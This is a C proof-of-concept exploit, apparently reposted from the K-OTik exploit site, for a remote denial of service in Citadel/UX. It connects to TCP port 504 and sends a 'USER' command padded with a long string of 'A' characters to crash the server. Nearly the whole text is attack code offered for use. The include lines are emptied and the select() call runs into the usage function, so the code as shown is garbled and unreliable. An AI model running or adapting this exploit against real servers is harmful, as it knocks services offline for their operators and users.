K-OTik : Citadel/UX Remote Denial of Service Proof of Concept

Citadel/UX Remote Denial of Service Proof of Concept
/* citadel_dos.c
 *
 * Citadel/UX Remote DoS exploit (Proof of Concept)
 *  
 * Tested in Slackware 9.0.0 / 9.1.0 / 10.0.0
 *    
 * by CoKi 
 * No System Group - www nosystem com ar
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define BUFFERSIZE 96+1
#define ERROR -1
#define TIMEOUT 3
#define PORT 504

int connect_timeout(int sfd, struct sockaddr *serv_addr,
  socklen_t addrlen, int timeout);
void use(char *program);

int main(int argc, char *argv[]) {
        char buffer[BUFFERSIZE], *p, temp[BUFFERSIZE];
        int sockfd;
        struct hostent *he;
        struct sockaddr_in dest_dir;

        if(argc != 2) use(argv[0]);

        p = buffer;

        printf("\n Citadel/UX Remote DoS exploit (Proof of Concept)\n");
        printf(" by CoKi >\n\n");
    
      memset(p, 'A', 96);
        p += 92;
        *p = '\0';

        printf(" [+] verifying host:\t");
        fflush(stdout);
        
        if((he=gethostbyname(argv[1])) == NULL) {
                herror("Error");
                printf("\n");
                exit(1);
        } 
        
        printf("OK\n");

        if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
                perror("Error");
                printf("\n");
                exit(1);
        }

        dest_dir.sin_family = AF_INET;
        dest_dir.sin_port = htons(PORT);
        dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
        bzero(&(dest_dir.sin_zero), 8);

        printf(" [+] conecting...\t");
        fflush(stdout);
        
        if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
                sizeof(struct sockaddr), TIMEOUT) == ERROR) {
                
                printf("Closed\n\n");
                exit(1);
        }

        printf("OK\n");
        
        printf(" [+] sending exploit...\t");
        fflush(stdout);
        
        recv(sockfd, temp, sizeof(temp), 0);
        send(sockfd, "USER ", 5, 0);
        send(sockfd, buffer, strlen(buffer), 0);
        send(sockfd, "\n", 1, 0);
        close(sockfd);
        
        printf("OK\n\n");
}

int connect_timeout(int sfd, struct sockaddr *serv_addr,
  socklen_t addrlen, int timeout) {

  int res, slen, flags;
  struct timeval tv;
  struct sockaddr_in addr;
  fd_set rdf, wrf;

  fcntl(sfd, F_SETFL, O_NONBLOCK);

  res = connect(sfd, serv_addr, addrlen);

  if (res >= 0) return res;

  FD_ZERO(&rdf);
  FD_ZERO(&wrf);

  FD_SET(sfd, &rdf);
  FD_SET(sfd, &wrf);
  bzero(&tv, sizeof(tv));
  tv.tv_sec = timeout;

  if (select(sfd + 1, &rdf, &wrf, 0, &tv) \n", program);
        exit(1);
}